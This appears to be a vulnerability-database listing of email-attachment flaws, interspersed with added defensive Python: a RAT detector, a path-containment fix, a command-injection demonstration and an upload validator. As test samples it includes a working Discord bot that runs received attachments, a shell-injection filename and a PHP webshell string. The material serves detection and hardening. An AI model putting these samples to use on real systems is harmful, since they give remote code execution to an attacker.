3319 matches found
EUVD-2025-26130
Malicious code in bioql PyPI...
EUVD-2025-18803
Malicious code in bioql PyPI...
EUVD-2022-3352
Malicious code in bioql PyPI...
EUVD-2023-54766
Malicious code in bioql PyPI...
EUVD-2022-37504
Malicious code in bioql PyPI...
EUVD-2022-48670
Malicious code in bioql PyPI...
MAL-2025-191712 Malicious code in d1snakegame (PyPI)
Source: kam193 8023a44d657b04f09628c938fa7fb4fbd8c1300f630aff31837b32f2337ce65f. The package starts a Discord bot that waits for messages and automatically executes any file sent as an attachment, effectively turning the package into a RAT...
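The pattern described for d1snakegame (a Discord client used as the C2 channel, an attachment fetched from a message, then executed) is recognisable statically. The scanner below is an added illustration, not the detection logic kam193 or OSV used; the indicator lists, the two package samples and the scoring rule are all constructed for this example.

```python
"""Heuristic scan of Python source for the 'Discord bot that runs attachments'
pattern. Added illustration; indicators and samples are constructed, not a
published signature for d1snakegame."""
import ast
from dataclasses import dataclass, field

# Assumed indicators: a bot framework as C2, an attachment fetch, and a way to run it.
C2_MODULES = {"discord"}
EXEC_CALLS = {"os.system", "subprocess.run", "subprocess.Popen",
              "subprocess.call", "os.startfile", "exec", "eval"}
FETCH_ATTRS = {"attachments", "save"}   # message.attachments / attachment.save()


@dataclass
class Findings:
    c2_imports: set = field(default_factory=set)
    exec_calls: set = field(default_factory=set)
    attachment_access: set = field(default_factory=set)

    @property
    def is_rat_like(self) -> bool:
        # All three capabilities in one module is the signal; any one alone is common.
        return bool(self.c2_imports and self.exec_calls and self.attachment_access)


def _dotted(node: ast.AST) -> str:
    """Render a Name/Attribute chain such as subprocess.run as a dotted string."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
    return ".".join(reversed(parts))


def scan_source(src: str) -> Findings:
    f = Findings()
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in C2_MODULES:
                    f.c2_imports.add(alias.name)
        elif isinstance(node, ast.ImportFrom) and node.module:
            if node.module.split(".")[0] in C2_MODULES:
                f.c2_imports.add(node.module)
        elif isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in EXEC_CALLS:
                f.exec_calls.add(name)
        elif isinstance(node, ast.Attribute) and node.attr in FETCH_ATTRS:
            f.attachment_access.add(node.attr)
    return f


# Constructed samples: a RAT-like bot and a harmless ping bot.
MALICIOUS_SAMPLE = '''
import os, subprocess
import discord

client = discord.Client()

@client.event
async def on_message(message):
    for att in message.attachments:
        path = os.path.join("/tmp", att.filename)
        await att.save(path)
        subprocess.Popen([path])   # runs whatever the operator sent
'''

BENIGN_SAMPLE = '''
import discord
client = discord.Client()

@client.event
async def on_message(message):
    if message.content == "!ping":
        await message.channel.send("pong")
'''

if __name__ == "__main__":
    for label, src in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        r = scan_source(src)
        print(label, "rat-like" if r.is_rat_like else "clean", r)
```

The rule deliberately requires all three capabilities together; a Discord library import or a subprocess call on its own is routine in legitimate packages, so either alone would flood a triage queue.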
Self-Propagating Malware Spreading Via WhatsApp, Targets Brazilian Users
Trend™ Research has identified an active campaign spreading via WhatsApp through a ZIP file attachment. When executed, the malware establishes persistence and hijacks the compromised WhatsApp account to send copies of itself to the victim’s contacts...
Directory Traversal
Overview: redmine-mcp-server is a production-ready MCP server for Redmine with security, pagination, and enterprise features. Affected versions of this package are vulnerable to Directory Traversal via the MCP endpoint. An attacker can gain access to restricted files by passing a specially craft...
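Both the redmine-mcp-server traversal above and the Flowise arbitrary-file-access entry further down are the same class: a user-supplied name is joined onto a base directory without checking that the result stays inside it. The example below is added here and is not code from either project; the base directory, the temp-tree layout and the endpoint name are assumptions. It contrasts the naive join with a containment check that resolves symlinks on both sides before comparing.

```python
"""Path containment for a 'read file by name' endpoint. Added example, not
redmine-mcp-server or Flowise code; directory layout is constructed."""
import os
import tempfile
from pathlib import Path


class PathTraversal(ValueError):
    pass


def vulnerable_resolve(base: str, user_path: str) -> str:
    # Naive join: '..' segments escape base, and an absolute user_path replaces it.
    return os.path.join(base, user_path)


def safe_resolve(base: str, user_path: str) -> Path:
    """Return the real path of user_path inside base, or raise PathTraversal.

    realpath() on both sides means a symlink planted inside base that points
    outside is rejected too, not just lexical '..' tricks.
    """
    if "\x00" in user_path:
        raise PathTraversal("NUL byte in path")
    base_real = Path(os.path.realpath(base))
    candidate = Path(os.path.realpath(os.path.join(base_real, user_path)))
    try:
        candidate.relative_to(base_real)
    except ValueError:
        raise PathTraversal(f"{user_path!r} escapes {base}") from None
    return candidate


def read_attachment(base: str, name: str) -> bytes:
    return safe_resolve(base, name).read_bytes()


def demo() -> dict:
    """Build a constructed temp tree and exercise both resolvers."""
    root = tempfile.mkdtemp()
    served = Path(root, "files")
    served.mkdir()
    Path(served, "report.txt").write_text("ok")
    secret = Path(root, "secret.txt")          # outside the served directory
    secret.write_text("top secret")
    Path(served, "link").symlink_to(secret)    # symlink planted inside base

    results = {}
    # The naive join happily lands on the secret file.
    results["naive_escapes"] = (
        os.path.realpath(vulnerable_resolve(str(served), "../secret.txt"))
        == os.path.realpath(str(secret)))
    results["good"] = read_attachment(str(served), "report.txt")
    for p in ("report.txt", "../secret.txt", "/etc/passwd", "link",
              "sub/../../secret.txt"):
        try:
            safe_resolve(str(served), p)
            results[p] = "allowed"
        except PathTraversal:
            results[p] = "blocked"
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

Note that os.path.join is not the protection here: with an absolute user path it discards the base entirely, which is why the check is on the resolved result rather than on the input string.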
A flaw was found in the xdg-email component of xdg-utils-1.1.0-rc1 and newer. When handling mailto: URIs, xdg-email allows attachments to be discreetly added via the URI when being passed to Thunderbird. An attacker could potentially send a victim a URI that automatically attaches a sensitive file to a new email. If a victim user does not notice that an attachment was added and sends the email, this could result in sensitive information disclosure. It has been confirmed that the code behind this issue is in xdg-email and not in Thunderbird.
...
CVE-2025-9762
The Post By Email plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the saveattachments function in all versions up to, and including, 1.0.4b. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's...
CVE-2025-9762 Post By Email <= 1.0.4b - Unauthenticated Arbitrary File Upload via Email Attachments
CVE-2025-9762
CVE-2025-9762 affects the WordPress plugin Post By Email (versions ≤ 1.0.4b). The vulnerability arises from missing file type validation in save_attachments, allowing unauthenticated arbitrary file uploads to the server, with potential for remote code execution. Wordfence’s vulnerability report q...
WordPress plugin Post By Email Operating System Command Injection Vulnerability
WordPress and WordPress plugins are both products of the WordPress Foundation. WordPress is a blogging platform developed in PHP that provides the ability to host a personal blog site on a PHP and MySQL based...
VulnCheck KEV: CVE-2025-59689
Libraesva ESG 4.5 through 5.5.x before 5.5.7 allows command injection via a compressed e-mail attachment. For ESG 5.0 a fix has been released in 5.0.31. For ESG 5.1 a fix has been released in 5.1.20. For ESG 5.2 a fix has been released in 5.2.31. For ESG 5.4 a fix has been released in 5.4.8. For...
Libraesva Email Security Gateway Security Vulnerability
Libraesva Email Security Gateway is an email security gateway from Libraesva (Italy). A security vulnerability exists in Libraesva Email Security Gateway versions 4.5 through 5.5.x prior to 5.5.7. It stems from improper handling of compressed email attachments and can lead to command injection attacks...
EUVD-2025-30249
Libraesva ESG 4.5 through 5.5.x before 5.5.7 allows command injection via a compressed e-mail attachment. For ESG 5.0 a fix has been released in 5.0.31. For ESG 5.1 a fix has been released in 5.1.20. For ESG 5.2 a fix has been released in 5.2.31. For ESG 5.4 a fix has been released in 5.4.8. For...
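The Libraesva entries above say only that a compressed attachment leads to command injection, not which command the gateway ran. The example below is added here and is not Libraesva code: it uses a harmless `echo` as a stand-in for whatever decompression or scanning tool a gateway would invoke, so the injection is visible without side effects, and then shows the two fixes a practitioner would reach for (argv lists instead of a shell string, and in-process inspection with no external tool at all). The crafted attachment name and the in-memory archive are constructed.

```python
"""Attachment filename in a shell string vs. as one argv element. Added example;
the 'echo' command stands in for an unnamed gateway tool (assumption)."""
import io
import subprocess
import zipfile

# Constructed filename from a crafted e-mail; ';' ends the echo command.
CRAFTED_NAME = "invoice.zip; echo INJECTED"


def vulnerable_command(name: str) -> str:
    # Attacker-controlled name interpolated straight into a shell line.
    return f"echo scanning {name}"


def run_vulnerable(name: str) -> list[str]:
    out = subprocess.run(vulnerable_command(name), shell=True,
                         capture_output=True, text=True, check=True).stdout
    return out.splitlines()            # two lines: the shell ran both commands


def run_safe(name: str) -> list[str]:
    # argv list, no shell: the name is delivered to the tool as a single argument.
    out = subprocess.run(["echo", "scanning", name],
                         capture_output=True, text=True, check=True).stdout
    return out.splitlines()            # one line, metacharacters inert


def list_archive_members(blob: bytes) -> list[str]:
    """Inspect a compressed attachment in-process: no shell, and member names are
    data to be checked, never paths to be created blindly."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return [info.filename for info in zf.infolist()]


def build_crafted_zip() -> bytes:
    """Constructed archive whose member name also carries shell syntax."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("report.txt; id", b"hello")
    return buf.getvalue()


if __name__ == "__main__":
    print("shell string :", run_vulnerable(CRAFTED_NAME))
    print("argv list    :", run_safe(CRAFTED_NAME))
    print("zip members  :", list_archive_members(build_crafted_zip()))
```

Quoting the name with shlex.quote would also stop this particular payload, but the argv form removes the shell from the path entirely and is the default to reach for; where a format library exists, not spawning a tool at all removes the filename from any command line.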
Denial Of Service (DoS)
com.liferay.portal and release.portal.bom are vulnerable to Denial of Service (DoS). The vulnerability is due to allowing unlimited file uploads through object entry attachment fields, which are stored in the document library, allowing an attacker to cause a Denial-of-Service condition...
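Two of the entries above fail on the same gate: Post By Email stores e-mail attachments without checking their type, and Liferay stores attachments without bounding how many or how large. The example below is added here and is not the plugin's PHP or Liferay's Java; it is the acceptance step a practitioner would put in front of any attachment store, with an extension allowlist tied to magic bytes, a reject list for server-side handler extensions anywhere in the name, filename sanitisation, and per-file and per-batch quotas. The limits, allowlist and sample attachments are assumptions.

```python
"""Accept-or-reject step for inbound attachments before they reach a web root.
Added example; limits, allowlist and samples are assumptions, not project code."""
import os
import re
from dataclasses import dataclass

MAX_ATTACHMENTS = 5            # per message (assumed quota)
MAX_BYTES_EACH = 2_000_000
MAX_BYTES_TOTAL = 5_000_000

# final extension -> acceptable magic-byte prefixes
ALLOWED = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "pdf": (b"%PDF-",),
    "txt": (b"",),             # any content
}
# must not appear as any extension in the name (shell.php.jpg still runs on some stacks)
EXECUTABLE = {"php", "phtml", "php5", "phar", "asp", "aspx", "jsp", "cgi", "sh"}


class Rejected(ValueError):
    pass


@dataclass
class Attachment:
    filename: str
    data: bytes


def safe_name(filename: str) -> str:
    """Drop path components and keep a conservative character set."""
    name = os.path.basename(filename.replace("\\", "/"))
    name = re.sub(r"[^A-Za-z0-9._-]", "_", name).strip(".")
    if not name:
        raise Rejected("empty filename")
    return name


def validate(att: Attachment) -> str:
    name = safe_name(att.filename)
    parts = name.lower().split(".")
    if len(parts) < 2:
        raise Rejected("no extension")
    ext = parts[-1]
    if ext not in ALLOWED:
        raise Rejected(f"extension .{ext} not allowed")
    if EXECUTABLE & set(parts[1:]):
        raise Rejected("executable extension in name")
    if len(att.data) > MAX_BYTES_EACH:
        raise Rejected("file too large")
    if not any(att.data.startswith(magic) for magic in ALLOWED[ext]):
        raise Rejected("content does not match extension")
    return name


def accept_batch(atts: list[Attachment]) -> list[str]:
    """Quota check first, so an oversized batch is refused before any parsing."""
    if len(atts) > MAX_ATTACHMENTS:
        raise Rejected("too many attachments")
    if sum(len(a.data) for a in atts) > MAX_BYTES_TOTAL:
        raise Rejected("batch too large")
    return [validate(a) for a in atts]


def triage(atts: list[Attachment]) -> dict:
    """Per-attachment verdicts, keyed by the original filename."""
    out = {}
    for a in atts:
        try:
            out[a.filename] = "accepted:" + validate(a)
        except Rejected as e:
            out[a.filename] = "rejected:" + str(e)
    return out


# Constructed samples: traversal + webshell, a real JPEG header, a double extension,
# and PHP source behind an image extension.
SAMPLES = [
    Attachment("../../wp-content/shell.php", b"<?php system($_GET['c']); ?>"),
    Attachment("photo.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16),
    Attachment("shell.php.jpg", b"\xff\xd8\xff"),
    Attachment("notes.png", b"<?php echo 1; ?>"),
]

if __name__ == "__main__":
    for k, v in triage(SAMPLES).items():
        print(k, "->", v)
```

The magic-byte check is what stops the last sample: its extension is on the allowlist, so an extension-only filter would have stored PHP source under a .png name.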
Flowise has arbitrary file access due to missing chat flow id validation
Summary: Missing chat flow id validation allows an attacker to access arbitrary files. Details: Commit https://github.com/FlowiseAI/Flowise/commit/8bd3de41533de78e4ef6c980e5704a1f9cb7ae6f and https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7 added check for filenam...